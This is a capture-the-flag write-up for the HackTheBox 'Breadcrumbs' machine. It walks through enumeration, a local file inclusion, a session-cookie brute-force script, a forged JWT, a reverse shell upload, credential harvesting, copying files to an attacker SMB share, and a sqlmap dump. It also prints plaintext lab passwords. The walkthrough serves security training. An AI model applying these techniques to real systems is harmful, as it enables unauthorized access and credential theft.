Home HackTheBox - Breadcrumbs Writeup
Post
Cancel

HackTheBox - Breadcrumbs Writeup

Information Gathering


Nmap scan

1
sudo nmap -sC -sV 10.10.10.228 -v
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA)
|   256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA)
|_  256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519)
80/tcp   open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
|_http-title: Library
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)

We have 6 ports open:

  • SSH
  • Webserver 80/443
  • SMB

Web Enumeration

Let’s take a loot at both ports 80/443, but seems they both give us the same pages! We can work one of these

ebook

Seems like it’s an e-book library

eth

We have a search page for books, let’s try to play with it a bit

ethtest

I tried few manual enumeration but nothing seem to give me an interesting output!

Let’s capture the request with burpsuite to see what’s actually going on

lfi1

Aside from the title and author parameters we have “method=0” which seems odd

Let’s first send the request to repeater and change “method=1”

lfi21

lfi22

We get a different and an interesting response which screams “local file inclusion” that also leaks the parameter “book”, let’s check if that works

lfi3

And yes! We have an LFI, let’s keep enumerating we don’t really have anything interesting to read yet

1
2
gobuster dir -u http://10.10.10.228/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x asp,aspx,php

-x prefix for adding extensions when fuzzing , since we’re working on windows box we may find asp/x files Also chose the lowercase version of raft-directories because windows is key sensitive,

gob

Seems like we have a login panel

login

Since we’re looking for files to read we’re not gonna try to do stuff with the login panel! Let’s run gobuster again

1
gobuster dir -u http://10.10.10.228/portal -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x asp,aspx,php

gob

Let’s check all of these

/includes/ gob2

/php/ files

users Here we have a list of users, Let’s take note of them first and save them somewhere in case we needed users later


Foothold


Let’s not waste more time and check the files under /includes/ and also the cookie.php under /portal/ with our LFI

include/fileController.php

filecont

We get the JWT secret

1
$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e'

Another interesting thing in the response

1
if(in_array($user, $admins) && $_SESSION['username'] == \"paul\")

Seems like we need to login as the user paul

Let’s check Cookie.php

cookie

If we clean the response, a quick sed to remove the “\r \n and "

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
/** * @param string $username  Username requesting session cookie * 
* @return string $session_cookie Returns the generated cookie *
* @devteam * Please DO NOT use default PHPSESSID; our security team says they are predictable. 
*CHANGE SECOND PART OF MD5 KEY EVERY WEEK **/

  function makesession($username){    
  	$max = ;    
  	$seed = rand(0, $max);    
  	$key = "s4lTy_stR1nG_".$username[$seed]."(!528./9890";    
  	$session_cookie = $username.md5($key);    
  	return $session_cookie;}

?>

We know that the user is “paul” which is a short username, we can generate all the possible cookies and try them until one works

1
2
3
4
5
6
7
8
9
<?php
$user="paul";
for ($seed = 0; $seed <= strlen($user) - 1; $seed++) {
	$key = "s4lTy_stR1nG_".$user[$seed]."(!528./9890";  
	$session_cookie = $user.md5($key);
	echo "[+] Cookie : ".$session_cookie."\n";
  
};
?>

cok

Let’s try them one by one and check if we can get in

adm1

adm.png

And we’re in!

Nothing interesting in the Issues page

issues

Let’s check the File management page

file

Let’s try to upload anything to see if it works

token

Seems like we need a token! We have the secret, but we forgot to check what data we should provide! Let’s check the response back

1
2
3
4
5
$ret = JWT::decode($jwt, $secret_key, array('HS256')); 
return $ret;
if($_SERVER['REQUEST_METHOD'] === \"POST\"){
  $admins = array(\"paul\");
  $user = validate()->data->username;

According to this response the content of JWT token should be

1
{"data":{"username":"paul"}}

Now we have everything we need let’s forge our token, we can either use python or jwt.io

1
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.4mJguG8tRd2z_feWJpmr_J3AdMeDPvW7GCK7cW7o0AI

Let’s add the cookie to our browser

Let’s to import anything

It worked!

Let’s upload the reverse shell!

And we’re in


Juliette User PrivESC


As usual, before running any enumeration tool we can check the webpage source to see if something is hidden there!

We can see an interesting folder under the /portal/

We have few files for users, Let’s check if they contains any password

1
Get-ChildItem | Select-String 'password'

And we get creds for user juliette

1
juliette:jUli901./())!

Let’s try to ssh into the box with these creds


Development User PrivESC


In juliette’s Desktop we can find an interesting file todo.html

Seems like we need to get the passwords that are stored in the stickynotes! According to google they should located under the %appdata% folder

1
Get-ChildItem *Sticky* -Recurse

We found a directory!

1
C:\users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\

It contains more folders, the \LocalState\ seems interesting!

Let’s copy these files to our machine! Fist we start our smbserver

1
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -ip 10.10.14.6 -smb2support euch .

and copy these files!

1
copy * \\10.10.14.6\euch

Let’s check the files! the only interesting file we need is plum.sqlite-wal

It contains the creds for the development user

1
2
\id=fc0d8d70-055d-4870-a5de-d76943a68ea2 development: fN3)sN5Ee@g

Let’s try to ssh with these creds


Root User PrivESC


Now we’re logged in as development, we can check what’s inside C:\Development\

Let’s copy it to our machine

1
2
copy Krypter_Linux \\10.10.14.6\euch

It’s a Linux executable, before going deeper in the binary it’s better to run strings or rabin2 -z to extract the printable strings in the binary!

What seems odd when you see the output is the port 1234!

1
http://passmanager.htb:1234/index.php

Also we have the GET parameters

1
method=select&username=administrator&table=passwords

Seems like it’s running locally!

Let’s forward it to our machine with ssh

1
ssh -L 1234:127.0.0.1:1234 development@10.10.10.228

The parameters names gives us a hint that it’s SQL injection let’s use sqlmap

1
sqlmap -u "http://127.0.0.1:1234/?method=select&username=administrator&table=passwords" --dump

We get the administrator’s password but it’s encrypted (AES)

Let’s use cyberchef to decrypt it

When i first did the machine, I overthinked this part, I thought that i needed to to find IV somewhere in the machine

And now let’s try to ssh into the box as the administrator and grab the flag!

This post is licensed under CC BY 4.0 by the author.